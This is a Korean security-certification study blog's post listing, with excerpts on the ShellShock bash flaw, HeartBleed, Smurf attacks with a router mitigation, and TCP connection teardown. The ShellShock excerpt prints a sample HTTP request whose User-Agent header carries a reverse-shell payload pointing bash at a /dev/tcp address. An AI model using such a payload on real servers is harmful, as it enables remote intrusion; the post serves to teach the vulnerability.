본문 바로가기

정보보안기사&CISSP관련172

[Day 121] GNU Bash 취약점(ShellShock)  개요 취약한 버전의 bash는 환경변수의 함수 선언문 뒤에 임의의 명령어를 삽입할 경우, 환경변수에 설정된 함수 선언 시 함수 선언의 끝을 인지하지 못하고 삽입한 명령어까지 실행하는 취약점이 있음. 이것을 GNU Bash 또는 ShellShock 취약점이라고 함 CGI를 이용한 Bash 취약점 공격유형 공격원리 CGI는 User-Agent 같은 요청 헤더정보를 쉘의 환경변수에 저장함. 공격자가 헤더정보에 함수와 명령어를 추가하여 전송하면 해당 명령어가 실행되는 취약점 발생 리버스 쉘 연결 유형 GET /cgi-bin/bash_vul.cgi HTTP1.1 User-Agent:(){ :; };/bin/bash > /dev/tcp/10.10.10,10 8081 0) 하고 있음. 즉 bash를 통해 화면으로 출.. 2020. 12. 9.
[Day 120] HeartBleed(하트블리드) 취약점 HeartBleed 취약점(2014년 4월) 하트블리드 취약점은 통신구간 암호화를 위해 많이 사용하는 OpenSSL 라이브러리의 하트비트 확장 모듈의 버그로 인하여 발생한 취약점으로 서버에 저장된 중요 메모리 데이터가 노출되는 취약점 하트비트 요청 메시지 처리 시 데이터길이 검증을 하지 않아, 시스템 메모리에 저장된 64KB 크기의 데이터를 외부에서 탈취할 수 있음 SSL/TLS 서버 개인키, 세션키, 쿠키 및 개인정보(ID,PW, 이메일 주소 등)이 노출될 수 있음 하트비트(HeartBeat) 확장 모듈 OpenSSL1.0에 추가된 기능 SSL/TLS 프로토콜에서 매번 연결을 재협상 하지 않아도 상호간의 연결지속신호를 주고받으면서 연결을 지속해주는 기능클라이언트가 하트비트를 요청하면서 Payload와 .. 2020. 12. 8.
[Day 119] Smurf Attack 개요 공격자가 희생자의 IP로 출발지 IP를 위조한 후, 증폭 네트워크에 ICMP Echo Request를 Broadcast 함 희생자는 다수의 ICMP Echo Reply를 수신하게 되어 트래픽 과다로 서비스 거부(DoS)상태가 됨 대응 방법 라우터에서 다른 네트워크에서 자신의 네트워크로 수신되는 Directed Broadcast Packet을 허용하지 않도록 설정 > enable # conf t (config) # interface FastEthenet 0/0 (config-if) # no ip directed-broadcast (config-lf) # end # 브로드캐스트 주소로 전송된 ICMP Echo Request에 대해 응답하지 않도록 시스템 설정 동일한 ICMP Echo Reply 패킷이 .. 2020. 12. 7.
[Day 118] TCP 연결 종료과정(4-Way Handshake) 1단계 클라이언트가 서버에서 FIN+ACK를 보내고 대기() 2단계 서버는 FIN+ACK에 대한 ACK를 보낸 후, 해당 어플리케이션에서 TCP 연결 종료를 할 때까지 대기() 클라이언트는 ACK를 받고 FIN ACK를 받을 때까지 대기() 3단계 서버는 해당 애플리케이션에서 TCP 연결 종료되면 클라이언트에게 FIN+ACK를 보냄() 4단계 클라이언트는 FIN ACK 수신 후 마지막 ACK를 보내고 2MSL시간동안 대기() 서버는 마지막 ACK 수신 후, 연결 종료() 클라이언트는 2 MSL(Maximum Segment Lifetime) 경과 후 연결 종료() 만약 서버가 마지막 ACK를 수신 못했다면 FIN+ACK 재전송이 발생할거고 이를 처리해줘야 하니까 대기하는 것 1~4분 정도 2020. 12. 6.